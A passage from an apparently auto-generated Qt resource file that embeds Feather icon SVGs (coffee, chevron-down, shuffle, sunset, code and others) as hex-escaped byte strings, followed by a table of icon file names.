\x32\x22\x20\x63\x79\x3d\x22\x35\x22\x20\x72\x3d\x22\x33\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x32\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\
\x20\x31\x32\x48\x32\x61\x31\x30\x20\x31\x30\x20\x30\x20\x30\x20\
\x30\x20\x32\x30\x20\x30\x68\x2d\x33\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xbf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x66\x66\x65\
\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\
\x38\x68\x31\x61\x34\x20\x34\x20\x30\x20\x30\x20\x31\x20\x30\x20\
\x38\x68\x2d\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x32\x20\x38\x68\x31\x36\x76\x39\x61\
\x34\x20\x34\x20\x30\x20\x30\x20\x31\x2d\x34\x20\x34\x48\x36\x61\
\x34\x20\x34\x20\x30\x20\x30\x20\x31\x2d\x34\x2d\x34\x56\x38\x7a\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x36\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\
\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\
\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\x31\
\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x34\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x0d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x36\x20\x39\x20\x31\
\x32\x20\x31\x35\x20\x31\x38\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xb9\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x75\x66\x66\
\x6c\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x33\x20\x32\x31\x20\x33\x20\
\x32\x31\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\
\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\
\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x31\
\x20\x31\x36\x20\x32\x31\x20\x32\x31\x20\x31\x36\x20\x32\x31\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x31\x35\
\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\x22\x32\x31\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x34\x22\x20\x78\x32\x3d\
\x22\x39\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x23\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x64\x69\x74\x2d\
\x32\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\x20\
\x33\x61\x32\x2e\x38\x32\x38\x20\x32\x2e\x38\x32\x38\x20\x30\x20\
\x31\x20\x31\x20\x34\x20\x34\x4c\x37\x2e\x35\x20\x32\x30\x2e\x35\
\x20\x32\x20\x32\x32\x6c\x31\x2e\x35\x2d\x35\x2e\x35\x4c\x31\x37\
\x20\x33\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x5e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x65\x72\x63\x65\
\x6e\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x39\
\x22\x20\x79\x31\x3d\x22\x35\x22\x20\x78\x32\x3d\x22\x35\x22\x20\
\x79\x32\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x36\x2e\x35\x22\x20\
\x63\x79\x3d\x22\x36\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x31\x37\x2e\x35\x22\x20\x63\x79\x3d\x22\
\x31\x37\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x4c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x75\x6e\x73\x65\
\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\x20\
\x31\x38\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x2d\x31\x30\x20\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\
\x2e\x32\x32\x22\x20\x79\x31\x3d\x22\x31\x30\x2e\x32\x32\x22\x20\
\x78\x32\x3d\x22\x35\x2e\x36\x34\x22\x20\x79\x32\x3d\x22\x31\x31\
\x2e\x36\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x38\x22\
\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\
\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\
\x2e\x33\x36\x22\x20\x79\x31\x3d\x22\x31\x31\x2e\x36\x34\x22\x20\
\x78\x32\x3d\x22\x31\x39\x2e\x37\x38\x22\x20\x79\x32\x3d\x22\x31\
\x30\x2e\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x32\
\x32\x22\x20\x78\x32\x3d\x22\x31\x22\x20\x79\x32\x3d\x22\x32\x32\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x35\x20\
\x31\x32\x20\x39\x20\x38\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x33\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x64\x65\x22\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x31\x36\x20\x31\x38\x20\x32\x32\x20\x31\x32\x20\x31\
\x36\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\
\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x38\x20\x36\x20\x32\x20\x31\x32\x20\x38\x20\x31\x38\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
"
qt_resource_name = b"\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x10\
\x0e\xa9\xd9\x27\
\x00\x6e\
\x00\x61\x00\x76\x00\x69\x00\x67\x00\x61\x00\x74\x00\x69\x00\x6f\x00\x6e\x00\x2d\x00\x32\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0e\
\x01\xca\x36\x47\
\x00\x68\
\x00\x61\x00\x72\x00\x64\x00\x2d\x00\x64\x00\x72\x00\x69\x00\x76\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0d\
\x06\xf2\x52\x27\
\x00\x66\
\x00\x69\x00\x6c\x00\x65\x00\x2d\x00\x74\x00\x65\x00\x78\x00\x74\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0b\
\x0c\x62\x05\x87\
\x00\x73\
\x00\x6c\x00\x69\x00\x64\x00\x65\x00\x72\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x12\
\x06\x82\xb2\x47\
\x00\x64\
\x00\x6f\x00\x77\x00\x6e\x00\x6c\x00\x6f\x00\x61\x00\x64\x00\x2d\x00\x63\x00\x6c\x00\x6f\x00\x75\x00\x64\x00\x2e\x00\x73\x00\x76\
\x00\x67\
\x00\x0c\
\x0c\xa7\x6b\x47\
\x00\x75\
\x00\x6d\x00\x62\x00\x72\x00\x65\x00\x6c\x00\x6c\x00\x61\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x09\xa2\x4f\x87\
\x00\x73\
\x00\x63\x00\x69\x00\x73\x00\x73\x00\x6f\x00\x72\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0e\
\x08\x31\x0a\xa7\
\x00\x73\
\x00\x68\x00\x69\x00\x65\x00\x6c\x00\x64\x00\x2d\x00\x6f\x00\x66\x00\x66\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x04\x59\xab\xc7\
\x00\x64\
\x00\x72\x00\x69\x00\x62\x00\x62\x00\x62\x00\x6c\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x11\
\x0f\x8f\x28\x27\
\x00\x64\
\x00\x69\x00\x76\x00\x69\x00\x64\x00\x65\x00\x2d\x00\x63\x00\x69\x00\x72\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\
\x00\x12\
\x0b\x20\xfd\x47\
\x00\x63\
\x00\x68\x00\x65\x00\x76\x00\x72\x00\x6f\x00\x6e\x00\x73\x00\x2d\x00\x72\x00\x69\x00\x67\x00\x68\x00\x74\x00\x2e\x00\x73\x00\x76\
\x00\x67\
\x00\x07\
\x09\x6b\x5a\x07\
\x00\x62\
\x00\x6f\x00\x78\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0d\
\x0b\x8b\x22\x47\
\x00\x62\
\x00\x72\x00\x69\x00\x65\x00\x66\x00\x63\x00\x61\x00\x73\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x0b\xb0\x22\xa7\
\x00\x76\
\x00\x6f\x00\x6c\x00\x75\x00\x6d\x00\x65\x00\x2d\x00\x31\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x09\
\x00\x28\xae\x47\
\x00\x73\
\x00\x6d\x00\x69\x00\x6c\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0b\
\x06\x21\xee\x47\
\x00\x6c\
\x00\x6f\x00\x67\x00\x2d\x00\x6f\x00\x75\x00\x74\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0d\
\x0e\x0e\xcb\xc7\
\x00\x70\
\x00\x61\x00\x70\x00\x65\x00\x72\x00\x63\x00\x6c\x00\x69\x00\x70\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x15\
\x0c\x6d\xbc\xc7\
\x00\x63\
\x00\x6f\x00\x72\x00\x6e\x00\x65\x00\x72\x00\x2d\x00\x72\x00\x69\x00\x67\x00\x68\x00\x74\x00\x2d\x00\x64\x00\x6f\x00\x77\x00\x6e\
\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x06\x3d\x65\xe7\
\x00\x63\
\x00\x68\x00\x72\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x0f\xb8\x9b\x87\
\x00\x67\
\x00\x69\x00\x74\x00\x68\x00\x75\x00\x62\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x0c\x28\x67\x27\
\x00\x73\
\x00\x68\x00\x69\x00\x65\x00\x6c\x00\x64\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x07\
\x00\x83\x5b\xc7\
\x00\x7a\
\x00\x61\x00\x70\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0e\
\x06\x50\xc3\xe7\
\x00\x75\
\x00\x73\x00\x65\x00\x72\x00\x2d\x00\x6d\x00\x69\x00\x6e\x00\x75\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x09\
\x09\x6b\xba\x47\
\x00\x69\
\x00\x6e\x00\x62\x00\x6f\x00\x78\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0e\
\x05\xb0\x78\xa7\
\x00\x63\
\x00\x61\x00\x6d\x00\x65\x00\x72\x00\x61\x00\x2d\x00\x6f\x00\x66\x00\x66\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0b\
\x00\x19\x49\x27\
\x00\x61\
\x00\x72\x00\x63\x00\x68\x00\x69\x00\x76\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0f\
\x06\x9f\x47\xa7\
\x00\x66\
\x00\x6f\x00\x6c\x00\x64\x00\x65\x00\x72\x00\x2d\x00\x70\x00\x6c\x00\x75\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x03\xc8\xeb\xc7\
\x00\x66\
\x00\x72\x00\x61\x00\x6d\x00\x65\x00\x72\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0d\
\x04\xda\xdc\xe7\
\x00\x67\
\x00\x69\x00\x74\x00\x2d\x00\x6d\x00\x65\x00\x72\x00\x67\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0d\
\x0c\xe7\x89\xc7\
\x00\x63\
\x00\x6c\x00\x69\x00\x70\x00\x62\x00\x6f\x00\x61\x00\x72\x00\x64\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x09\
\x07\x9e\xae\x87\
\x00\x73\
\x00\x6c\x00\x61\x00\x63\x00\x6b\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0f\
\x0f\xe6\x17\xc7\
\x00\x63\
\x00\x72\x00\x65\x00\x64\x00\x69\x00\x74\x00\x2d\x00\x63\x00\x61\x00\x72\x00\x64\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x09\x43\x1b\xc7\
\x00\x78\
\x00\x2d\x00\x63\x00\x69\x00\x72\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x00\x4e\x54\xa7\
\x00\x6c\
\x00\x69\x00\x6e\x00\x6b\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0d\
\x01\xa4\x2a\xe7\
\x00\x63\
\x00\x6c\x00\x6f\x00\x75\x00\x64\x00\x2d\x00\x6f\x00\x66\x00\x66\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x12\
\x00\x55\xbe\x27\
\x00\x6d\
\x00\x65\x00\x73\x00\x73\x00\x61\x00\x67\x00\x65\x00\x2d\x00\x63\x00\x69\x00\x72\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x73\x00\x76\
\x00\x67\
\x00\x0f\
\x00\x12\x37\xe7\
\x00\x74\
\x00\x6f\x00\x67\x00\x67\x00\x6c\x00\x65\x00\x2d\x00\x6c\x00\x65\x00\x66\x00\x74\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x07\xf1\x0b\xa7\
\x00\x78\
\x00\x2d\x00\x73\x00\x71\x00\x75\x00\x61\x00\x72\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x07\
\x01\xcc\x5a\x27\
\x00\x6b\
\x00\x65\x00\x79\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x13\
\x04\x26\xb1\xa7\
\x00\x61\
\x00\x72\x00\x72\x00\x6f\x00\x77\x00\x2d\x00\x75\x00\x70\x00\x2d\x00\x63\x00\x69\x00\x72\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x73\
\x00\x76\x00\x67\
\x00\x0b\
\x08\x72\x92\x07\
\x00\x63\
\x00\x6f\x00\x6d\x00\x70\x00\x61\x00\x73\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x05\
\x00\x7b\x5a\xc7\
\x00\x78\
\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x0f\xd7\x57\x67\
\x00\x67\
\x00\x69\x00\x66\x00\x74\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x15\
\x05\x07\xd6\xa7\
\x00\x63\
\x00\x6f\x00\x72\x00\x6e\x00\x65\x00\x72\x00\x2d\x00\x64\x00\x6f\x00\x77\x00\x6e\x00\x2d\x00\x72\x00\x69\x00\x67\x00\x68\x00\x74\
\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x06\xc8\x54\x47\
\x00\x6d\
\x00\x6f\x00\x76\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x0f\x79\xba\x47\
\x00\x6d\
\x00\x61\x00\x78\x00\x69\x00\x6d\x00\x69\x00\x7a\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x16\
\x0e\x69\xe8\x07\
\x00\x61\
\x00\x72\x00\x72\x00\x6f\x00\x77\x00\x2d\x00\x72\x00\x69\x00\x67\x00\x68\x00\x74\x00\x2d\x00\x63\x00\x69\x00\x72\x00\x63\x00\x6c\
\x00\x65\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x04\xd2\x54\xc7\
\x00\x69\
\x00\x6e\x00\x66\x00\x6f\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x07\
\x0c\xf8\x5a\x07\
\x00\x65\
